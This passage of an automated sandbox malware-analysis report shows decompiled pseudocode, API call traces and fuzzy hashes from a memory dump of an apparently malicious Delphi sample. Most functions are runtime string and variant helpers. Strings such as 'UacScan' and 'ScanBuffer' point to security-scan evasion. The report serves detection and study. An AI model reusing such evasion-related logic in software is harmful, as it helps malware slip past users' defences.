                                                                                                  						_push( *__edx);
                                                                                                  						 *__edx = __eax;
                                                                                                  						L02851260();
                                                                                                  						return __eax;
                                                                                                  					}
                                                                                                  				}
                                                                                                  			}









                                                                                                  APIs
                                                                                                  • SysFreeString.OLEAUT32(0286C78C), ref: 02854C32
                                                                                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 02854D1F
                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 02854D31
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: String$Free$Alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 986138563-0
                                                                                                  • Opcode ID: 9cc863aca943af32668bddaa73da5bb5f203b93e717713a200e04cd1a03a22e4
                                                                                                  • Instruction ID: 30e5b66b01983549ed636af3cb2a6be0df377cdae8ca83b015e2f5fbae326e8c
                                                                                                  • Opcode Fuzzy Hash: 9cc863aca943af32668bddaa73da5bb5f203b93e717713a200e04cd1a03a22e4
                                                                                                  • Instruction Fuzzy Hash: 2FE0ECBC1052256EFB146F248844B3A326AAFC1746B944499EC08CA154DB749881AE36
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 85%
                                                                                                  			E028670D4(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, signed char* __edx, void* __edi, void* __esi, void* __fp0, signed int _a4, signed int* _a8) {
                                                                                                  				char _v36;
                                                                                                  				intOrPtr* _v40;
                                                                                                  				intOrPtr* _v44;
                                                                                                  				signed int _v48;
                                                                                                  				signed int _v52;
                                                                                                  				signed int* _v56;
                                                                                                  				signed int* _v60;
                                                                                                  				signed int _v64;
                                                                                                  				signed int* _v68;
                                                                                                  				signed int _v72;
                                                                                                  				signed int _v76;
                                                                                                  				intOrPtr _v80;
                                                                                                  				char _v84;
                                                                                                  				signed int _v1620;
                                                                                                  				signed int _t140;
                                                                                                  				intOrPtr _t141;
                                                                                                  				intOrPtr* _t142;
                                                                                                  				intOrPtr _t145;
                                                                                                  				signed char _t153;
                                                                                                  				signed char _t154;
                                                                                                  				signed int* _t161;
                                                                                                  				signed int _t203;
                                                                                                  				signed int _t204;
                                                                                                  				void* _t205;
                                                                                                  				intOrPtr _t219;
                                                                                                  				intOrPtr _t220;
                                                                                                  				intOrPtr _t221;
                                                                                                  				signed int _t250;
                                                                                                  				intOrPtr _t251;
                                                                                                  				signed char* _t253;
                                                                                                  				void* _t256;
                                                                                                  				void* _t257;
                                                                                                  				intOrPtr _t258;
                                                                                                  				void* _t272;
                                                                                                  
                                                                                                  				_t272 = __fp0;
                                                                                                  				_t256 = _t257;
                                                                                                  				_t258 = _t257 + 0xfffff9b0;
                                                                                                  				_v44 = __ecx;
                                                                                                  				_t253 = __edx;
                                                                                                  				_v40 = __eax;
                                                                                                  				_t219 =  *0x285cd60; // 0x285cd64
                                                                                                  				E02854F04( &_v36, _t219);
                                                                                                  				_push(_t256);
                                                                                                  				_push(0x28673ff);
                                                                                                  				_push( *[fs:eax]);
                                                                                                  				 *[fs:eax] = _t258;
                                                                                                  				_v52 = 0;
                                                                                                  				_t207 = 0;
                                                                                                  				_push(_t256);
                                                                                                  				_push(0x28673dc);
                                                                                                  				_push( *[fs:ecx]);
                                                                                                  				 *[fs:ecx] = _t258;
                                                                                                  				_t250 =  *(__edx + 1) & 0x000000ff;
                                                                                                  				if(_t250 > 0x40) {
                                                                                                  					_t207 =  *0x28a2c9c; // 0x2866a08
                                                                                                  					E0285B02C(_t207, 1);
                                                                                                  					E02853E5C();
                                                                                                  				}
                                                                                                  				if(_t250 == 0) {
                                                                                                  					L25:
                                                                                                  					_v84 =  &_v1620;
                                                                                                  					_v80 = _v44 + 4;
                                                                                                  					_v76 = _t250;
                                                                                                  					_v72 = _t253[2] & 0x000000ff;
                                                                                                  					_t220 =  *_v44;
                                                                                                  					_t140 =  *_t253 & 0x000000ff;
                                                                                                  					if(_t140 != 4) {
                                                                                                  						__eflags = _t140 - 1;
                                                                                                  						if(__eflags == 0) {
                                                                                                  							__eflags = _t250;
                                                                                                  							if(__eflags == 0) {
                                                                                                  								__eflags = _a4;
                                                                                                  								if(__eflags != 0) {
                                                                                                  									_t140 = 3;
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						if((_v1620 & 0x00000fff) == 9) {
                                                                                                  							_t140 = 8;
                                                                                                  						}
                                                                                                  						 *_v44 = 0xfffffffd;
                                                                                                  						_v80 = _v80 - 4;
                                                                                                  						_v72 = _v72 + 1;
                                                                                                  					}
                                                                                                  					_push(0);
                                                                                                  					_push( &_v36);
                                                                                                  					_push(_a4);
                                                                                                  					_t210 =  &_v84;
                                                                                                  					_push( &_v84);
                                                                                                  					_push(_t140);
                                                                                                  					_push(0);
                                                                                                  					_t141 =  *0x28a2cdc; // 0x2877a04
                                                                                                  					_push(_t141);
                                                                                                  					_push(_t220);
                                                                                                  					_t142 = _v40;
                                                                                                  					_push(_t142);
                                                                                                  					if( *((intOrPtr*)( *_t142 + 0x18))() != 0) {
                                                                                                  						E028676AC();
                                                                                                  					}
                                                                                                  					_t203 = _v52;
                                                                                                  					if(_t203 == 0) {
                                                                                                  						L39:
                                                                                                  						_t145 = 0;
                                                                                                  						_pop(_t221);
                                                                                                  						 *[fs:eax] = _t221;
                                                                                                  						_push(0x28673e3);
                                                                                                  						_t204 = _v52;
                                                                                                  						if(_t204 == 0) {
                                                                                                  							L41:
                                                                                                  							return _t145;
                                                                                                  						} else {
                                                                                                  							goto L40;
                                                                                                  						}
                                                                                                  						do {
                                                                                                  							L40:
                                                                                                  							_t204 = _t204 - 1;
                                                                                                  							_t145 =  *((intOrPtr*)(_t256 + _t204 * 8 - 0x250));
                                                                                                  							_push(_t145);
                                                                                                  							L0285CDB4();
                                                                                                  						} while (_t204 != 0);
                                                                                                  						goto L41;
                                                                                                  					} else {
                                                                                                  						do {
                                                                                                  							_t203 = _t203 - 1;
                                                                                                  							_t254 = _t256 + _t203 * 8 - 0x250;
                                                                                                  							_t251 =  *((intOrPtr*)(_t256 + _t203 * 8 - 0x250 + 4));
                                                                                                  							_t268 = _t251;
                                                                                                  							if(_t251 != 0) {
                                                                                                  								E02855350( *_t254, _t210, _t251, _t268);
                                                                                                  							}
                                                                                                  						} while (_t203 != 0);
                                                                                                  						goto L39;
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_v56 = _a8;
                                                                                                  					_v60 = _t256 + (_t250 + _t250) * 8 - 0x650;
                                                                                                  					_t205 = 0;
                                                                                                  					do {
                                                                                                  						_v60 = _v60 - 0x10;
                                                                                                  						_t153 = _t253[_t205 + 3] & 0x000000ff;
                                                                                                  						_v48 = _t153 & 0x7f;
                                                                                                  						_t154 = _t153 & 0x00000080;
                                                                                                  						if(_v48 != 0xa) {
                                                                                                  							__eflags = _v48 - 0x48;
                                                                                                  							if(_v48 != 0x48) {
                                                                                                  								__eflags = _t154;
                                                                                                  								if(_t154 == 0) {
                                                                                                  									__eflags = _v48 - 0xc;
                                                                                                  									if(_v48 != 0xc) {
                                                                                                  										 *_v60 = _v48;
                                                                                                  										_v60[2] =  *_v56;
                                                                                                  										__eflags = _v48 - 5;
                                                                                                  										if(_v48 >= 5) {
                                                                                                  											__eflags = _v48 - 7;
                                                                                                  											if(_v48 <= 7) {
                                                                                                  												_t93 =  &_v56;
                                                                                                  												 *_t93 =  &(_v56[1]);
                                                                                                  												__eflags =  *_t93;
                                                                                                  												_v60[3] =  *_v56;
                                                                                                  											}
                                                                                                  										}
                                                                                                  									} else {
                                                                                                  										__eflags =  *_v56 - 0x100;
                                                                                                  										if( *_v56 != 0x100) {
                                                                                                  											_t161 = _v56;
                                                                                                  											 *_v60 =  *_t161;
                                                                                                  											_v60[1] = _t161[1];
                                                                                                  											_t207 = _v60;
                                                                                                  											_v60[2] = _t161[2];
                                                                                                  											_v60[3] = _t161[3];
                                                                                                  											_v56 =  &(_v56[3]);
                                                                                                  										} else {
                                                                                                  											_v68 = _t256 + _v52 * 8 - 0x250;
                                                                                                  											 *_v68 = E02855374(_v56[2], _t207);
                                                                                                  											_v68[1] = 0;
                                                                                                  											 *_v60 = 8;
                                                                                                  											_v60[2] =  *_v68;
                                                                                                  											_v52 = _v52 + 1;
                                                                                                  										}
                                                                                                  									}
                                                                                                  									goto L23;
                                                                                                  								}
                                                                                                  								__eflags = _v48 - 0xc;
                                                                                                  								if(_v48 == 0xc) {
                                                                                                  									__eflags =  *( *_v56) - 0x100;
                                                                                                  									if( *( *_v56) == 0x100) {
                                                                                                  										_t207 = 8;
                                                                                                  										E0285EABC( *_v56, 8,  *_v56, _t250, _t272);
                                                                                                  									}
                                                                                                  								}
                                                                                                  								 *_v60 = _v48 | 0x00004000;
                                                                                                  								_v60[2] =  *_v56;
                                                                                                  								goto L23;
                                                                                                  							} else {
                                                                                                  								_v64 = _t256 + _v52 * 8 - 0x250;
                                                                                                  								__eflags = _t154;
                                                                                                  								if(_t154 == 0) {
                                                                                                  									 *_v64 = E02855374( *_v56, _t207);
                                                                                                  									__eflags = 0;
                                                                                                  									 *(_v64 + 4) = 0;
                                                                                                  									 *_v60 = 8;
                                                                                                  									_v60[2] =  *_v64;
                                                                                                  								} else {
                                                                                                  									 *_v64 = E02855374( *( *_v56), _t207);
                                                                                                  									 *(_v64 + 4) =  *_v56;
                                                                                                  									 *_v60 = 0x4008;
                                                                                                  									_v60[2] = _v64;
                                                                                                  								}
                                                                                                  								_v52 = _v52 + 1;
                                                                                                  								L23:
                                                                                                  								_t98 =  &_v56;
                                                                                                  								 *_t98 =  &(_v56[1]);
                                                                                                  								__eflags =  *_t98;
                                                                                                  								goto L24;
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							 *_v60 = 0xa;
                                                                                                  							_v60[2] = 0x80020004;
                                                                                                  						}
                                                                                                  						L24:
                                                                                                  						_t205 = _t205 + 1;
                                                                                                  					} while (_t250 != _t205);
                                                                                                  					goto L25;
                                                                                                  				}
                                                                                                  			}


                                                                                                  APIs
                                                                                                  • SysFreeString.OLEAUT32(?), ref: 028673D2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeString
                                                                                                  • String ID: H
                                                                                                  • API String ID: 3341692771-2852464175
                                                                                                  • Opcode ID: 1b37cd4283f3c3b8d6a4845380b80d315cfce02897e5214ceb04d61f6dc0dcc6
                                                                                                  • Instruction ID: 2e93246c1cd76cb6082b4124055f676add8de85276f0f92099e5dfc82a0b4c3c
                                                                                                  • Opcode Fuzzy Hash: 1b37cd4283f3c3b8d6a4845380b80d315cfce02897e5214ceb04d61f6dc0dcc6
                                                                                                  • Instruction Fuzzy Hash: DAB1D578A016089FDB10CF99D584AADFBF2FF49318F148169E809EB365D734A945CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 66%
                                                                                                  			E0285E744(signed short* __eax, void* __ecx, signed short* __edx) {
                                                                                                  				intOrPtr* _v16;
                                                                                                  				void* _t15;
                                                                                                  				signed short* _t23;
                                                                                                  				signed short _t34;
                                                                                                  				signed short* _t35;
                                                                                                  				void* _t36;
                                                                                                  
                                                                                                  				_t12 = __eax;
                                                                                                  				_push(__ecx);
                                                                                                  				_t35 = __edx;
                                                                                                  				_t23 = __eax;
                                                                                                  				if(( *__eax & 0x0000bfe8) != 0) {
                                                                                                  					_t12 = E0285E348(__eax, __ecx);
                                                                                                  				}
                                                                                                  				_t34 =  *_t35 & 0x0000ffff;
                                                                                                  				if(_t34 >= 0x14) {
                                                                                                  					if(_t34 != 0x100) {
                                                                                                  						if(_t34 != 0x101) {
                                                                                                  							if((_t34 & 0x00002000) == 0) {
                                                                                                  								if(E02862E88(_t34, _t36) == 0) {
                                                                                                  									_push(_t35);
                                                                                                  									_push(_t23);
                                                                                                  									L0285CDD4();
                                                                                                  									_t15 = E0285E014(_t14);
                                                                                                  								} else {
                                                                                                  									_t15 =  *((intOrPtr*)( *_v16 + 0x28))(0);
                                                                                                  								}
                                                                                                  							} else {
                                                                                                  								_t15 = E0285E570(_t23, 0x285e73c, _t35);
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							 *_t23 = _t34;
                                                                                                  							_t23[4] = _t35[4];
                                                                                                  							_t15 =  *0x28a62a4();
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						 *_t23 = 0x100;
                                                                                                  						_t23[4] = 0;
                                                                                                  						_t4 =  &(_t23[4]); // 0x8
                                                                                                  						_t15 = E028544F4(_t4, _t35[4]);
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_push(_t35);
                                                                                                  					_push(_t23); // executed
                                                                                                  					L0285CDD4(); // executed
                                                                                                  					_t15 = E0285E014(_t12);
                                                                                                  				}
                                                                                                  				return _t15;
                                                                                                  			}


                                                                                                  APIs
                                                                                                  • VariantCopy.OLEAUT32(00000000,00000000), ref: 0285E765
                                                                                                    • Part of subcall function 0285E348: VariantClear.OLEAUT32(?), ref: 0285E357
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Variant$ClearCopy
                                                                                                  • String ID:
                                                                                                  • API String ID: 274517740-0
                                                                                                  • Opcode ID: f2c9c445b7b70306ac46cbf5d15be222f2ef307eeb87940c906870e91de55256
                                                                                                  • Instruction ID: 334dcfd48bd660353f83f4900fa6bcc26500b9916c37e66da238de8982fb476f
                                                                                                  • Opcode Fuzzy Hash: f2c9c445b7b70306ac46cbf5d15be222f2ef307eeb87940c906870e91de55256
                                                                                                  • Instruction Fuzzy Hash: 7511C22CB0023487CB20AF38CDC466A27DAEF843547148466EE4ECF215DB30CE01CBA2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 70%
                                                                                                  			E0285E3E0(intOrPtr _a4, signed short* _a8, intOrPtr _a12, char _a16) {
                                                                                                  				void* _v8;
                                                                                                  				char* _v12;
                                                                                                  				char _v28;
                                                                                                  				void* __ebp;
                                                                                                  				signed int _t27;
                                                                                                  				intOrPtr _t28;
                                                                                                  				intOrPtr _t41;
                                                                                                  				intOrPtr _t47;
                                                                                                  				void* _t54;
                                                                                                  				signed short* _t56;
                                                                                                  				void* _t59;
                                                                                                  				intOrPtr _t63;
                                                                                                  				void* _t71;
                                                                                                  				void* _t73;
                                                                                                  				intOrPtr _t74;
                                                                                                  
                                                                                                  				_t71 = _t73;
                                                                                                  				_t74 = _t73 + 0xffffffe8;
                                                                                                  				_t56 = _a8;
                                                                                                  				if( *_t56 != 0x400c) {
                                                                                                  					__eflags = _a4;
                                                                                                  					if(_a4 != 0) {
                                                                                                  						_push( &_v28);
                                                                                                  						L0285CDC4();
                                                                                                  						_v12 =  &_v28;
                                                                                                  					} else {
                                                                                                  						_v12 = 0;
                                                                                                  					}
                                                                                                  					_push(_t71);
                                                                                                  					_push(0x285e4d4);
                                                                                                  					_push( *[fs:eax]);
                                                                                                  					 *[fs:eax] = _t74;
                                                                                                  					_t68 =  *_t56 & 0x0000ffff;
                                                                                                  					_t27 =  *_t56 & 0xffff;
                                                                                                  					__eflags = _t27 - 0x101;
                                                                                                  					if(__eflags > 0) {
                                                                                                  						_t28 = _t27 - 0x4009;
                                                                                                  						__eflags = _t28;
                                                                                                  						if(_t28 == 0) {
                                                                                                  							goto L12;
                                                                                                  						} else {
                                                                                                  							__eflags = _t28 != 4;
                                                                                                  							if(_t28 != 4) {
                                                                                                  								goto L14;
                                                                                                  							} else {
                                                                                                  								goto L12;
                                                                                                  							}
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						if(__eflags == 0) {
                                                                                                  							L12:
                                                                                                  							__eflags =  *0x28a6298;
                                                                                                  							if( *0x28a6298 != 0) {
                                                                                                  								 *0x28a6298(_v12, _t56, _a12,  &_a16); // executed
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							_t47 = _t27 - 9;
                                                                                                  							__eflags = _t47;
                                                                                                  							if(_t47 == 0) {
                                                                                                  								goto L12;
                                                                                                  							} else {
                                                                                                  								__eflags = _t47 == 4;
                                                                                                  								if(_t47 == 4) {
                                                                                                  									goto L12;
                                                                                                  								} else {
                                                                                                  									L14:
                                                                                                  									_t41 = E02862E88(_t68,  &_v8);
                                                                                                  									__eflags = _t41;
                                                                                                  									if(_t41 == 0) {
                                                                                                  										E0285DC7C(_t59);
                                                                                                  									} else {
                                                                                                  										 *((intOrPtr*)( *_v8 + 0x10))( &_a16, _a12);
                                                                                                  									}
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  					_pop(_t63);
                                                                                                  					 *[fs:eax] = _t63;
                                                                                                  					_push(0x285e4db);
                                                                                                  					__eflags = _v12;
                                                                                                  					if(_v12 != 0) {
                                                                                                  						E0285E7F0(_a4, _v12);
                                                                                                  						return E0285E3C4( &_v28);
                                                                                                  					}
                                                                                                  					return 0;
                                                                                                  				} else {
                                                                                                  					_t54 = E0285E3E0(_a4, _t56[4], _a12, _a16);
                                                                                                  					return _t54;
                                                                                                  				}
                                                                                                  			}

                                                                                                  0x00000000
                                                                                                  0x0285e4ce
                                                                                                  0x0285e4d3
                                                                                                  0x0285e3f2
                                                                                                  0x0285e402
                                                                                                  0x0285e4e0
                                                                                                  0x0285e4e0

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitVariant
                                                                                                  • String ID:
                                                                                                  • API String ID: 1927566239-0
                                                                                                  • Opcode ID: 7a0bf3e4d656498c22b58117816924750e002fb80d136bc9df7251357bfe86a0
                                                                                                  • Instruction ID: d404897d7234a27115808495495cc6dfef4a740c9bec64ca5852824b605f8c0e
                                                                                                  • Opcode Fuzzy Hash: 7a0bf3e4d656498c22b58117816924750e002fb80d136bc9df7251357bfe86a0
                                                                                                  • Instruction Fuzzy Hash: 82314F7DA00628EBDB20DF9CCD84AAA77A9EB0C314F4484A1ED09D7240D734EB50CB61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 32%
                                                                                                  			E02866D64(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
                                                                                                  				char _v8;
                                                                                                  				intOrPtr _t21;
                                                                                                  				intOrPtr _t26;
                                                                                                  
                                                                                                  				_push(0);
                                                                                                  				_push(_t26);
                                                                                                  				_push(0x2866db1);
                                                                                                  				_push( *[fs:eax]);
                                                                                                  				 *[fs:eax] = _t26;
                                                                                                  				E02854DA4( &_v8, __eax);
                                                                                                  				_push(E02854DB4(_v8)); // executed
                                                                                                  				L0285CDAC(); // executed
                                                                                                  				E02866D54(_t9);
                                                                                                  				_pop(_t21);
                                                                                                  				 *[fs:eax] = _t21;
                                                                                                  				_push(0x2866db8);
                                                                                                  				return E02854C24( &_v8);
                                                                                                  			}







                                                                                                  APIs
                                                                                                  • CLSIDFromProgID.OLE32(00000000,?,00000000,02866DB1,?,?,?,00000000), ref: 02866D91
                                                                                                    • Part of subcall function 02854C24: SysFreeString.OLEAUT32(0286C78C), ref: 02854C32
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeFromProgString
                                                                                                  • String ID:
                                                                                                  • API String ID: 4225568880-0
                                                                                                  • Opcode ID: 201da4dbccaf64a4f1a79e1bcf74a3b5f28f851d7132f061d1d4129778aac0ab
                                                                                                  • Instruction ID: 2d615c65336c75673c81ce5a388a728ad5de3a35f7b29550b195d0b6dd04887a
                                                                                                  • Opcode Fuzzy Hash: 201da4dbccaf64a4f1a79e1bcf74a3b5f28f851d7132f061d1d4129778aac0ab
                                                                                                  • Instruction Fuzzy Hash: 62E0657D604268BFE701EBAACC519A977EEDF89710B5104B1EC00D2610EA797D049865
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0285582C(void* __eax) {
                                                                                                  				char _v272;
                                                                                                  				intOrPtr _t14;
                                                                                                  				void* _t16;
                                                                                                  				intOrPtr _t18;
                                                                                                  				CHAR* _t19;
                                                                                                  
                                                                                                  				_t16 = __eax;
                                                                                                  				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                                                                                  					_t3 = _t16 + 4; // 0x2850000
                                                                                                  					GetModuleFileNameA( *_t3,  &_v272, 0x105);
                                                                                                  					_t14 = E02855A90(_t19); // executed
                                                                                                  					_t18 = _t14;
                                                                                                  					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                                                                                                  					if(_t18 == 0) {
                                                                                                  						_t5 = _t16 + 4; // 0x2850000
                                                                                                  						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_t7 = _t16 + 0x10; // 0x2850000
                                                                                                  				return  *_t7;
                                                                                                  			}









                                                                                                  APIs
                                                                                                  • GetModuleFileNameA.KERNEL32(02850000,?,00000105), ref: 0285584A
                                                                                                    • Part of subcall function 02855A90: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02850000,02877790), ref: 02855AAC
                                                                                                    • Part of subcall function 02855A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02850000,02877790), ref: 02855ACA
                                                                                                    • Part of subcall function 02855A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02850000,02877790), ref: 02855AE8
                                                                                                    • Part of subcall function 02855A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02855B06
                                                                                                    • Part of subcall function 02855A90: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02855B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02855B4F
                                                                                                    • Part of subcall function 02855A90: RegQueryValueExA.ADVAPI32(?,02855CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02855B95,?,80000001), ref: 02855B6D
                                                                                                    • Part of subcall function 02855A90: RegCloseKey.ADVAPI32(?,02855B9C,00000000,?,?,00000000,02855B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02855B8F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                  • String ID:
                                                                                                  • API String ID: 2796650324-0
                                                                                                  • Opcode ID: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                                  • Instruction ID: b651aa9ee7a7fba482d1908b06dfe2938727a23bd21a2d142f365f95aee88a94
                                                                                                  • Opcode Fuzzy Hash: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                                  • Instruction Fuzzy Hash: 23E06D79A002248BCB10DE5C88C0B5733D8AB08754F8409A1EC68CF246D374D9208BD1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0285C348(struct HINSTANCE__* __eax, void* __edx) {
                                                                                                  				char _v272;
                                                                                                  				long _t4;
                                                                                                  				void* _t11;
                                                                                                  				void* _t12;
                                                                                                  				void* _t13;
                                                                                                  
                                                                                                  				_t11 = __edx;
                                                                                                  				_t4 = GetModuleFileNameA(__eax,  &_v272, 0x105); // executed
                                                                                                  				return E02854590(_t11, _t4, _t12, _t13);
                                                                                                  			}








                                                                                                  0x0285c350
                                                                                                  0x0285c35f
                                                                                                  0x0285c377

                                                                                                  APIs
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,028A65D4,0286CE01,ScanString,02874C4C,ScanString,02874C4C,ScanBuffer,02874C4C,UacInitialize,02874C4C,UacScan,02874C4C), ref: 0285C35F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileModuleName
                                                                                                  • String ID:
                                                                                                  • API String ID: 514040917-0
                                                                                                  • Opcode ID: 7f347b7f449ef46407a4c85a82607c806235aba9dcff474c9952b2882a4d2a65
                                                                                                  • Instruction ID: e63ab04a38cf87b483496e3e5f74a6ef779fd7153af62e5d81a53d71ff86c7e0
                                                                                                  • Opcode Fuzzy Hash: 7f347b7f449ef46407a4c85a82607c806235aba9dcff474c9952b2882a4d2a65
                                                                                                  • Instruction Fuzzy Hash: 6CD0A9AAB006342BE300A16C2C818AB32CE8B88B20F4000217998CA282FA608E4006D2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E02857E40(void* __eax) {
                                                                                                  				signed char _t5;
                                                                                                  
